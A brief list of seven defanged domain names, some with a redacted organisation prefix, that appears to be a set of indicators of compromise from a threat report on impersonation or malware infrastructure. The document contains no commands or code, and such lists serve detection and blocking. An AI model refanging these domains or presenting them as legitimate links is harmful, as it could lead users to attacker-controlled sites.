  • (entity)-cert[.]com
  • (entity)-no[.]org
  • (entity)-fr[.]org
  • (entity)-acquisition[.]org
  • (entity)-trust[.]org
  • riscomponents[.]pw
  • nlscdn[.]com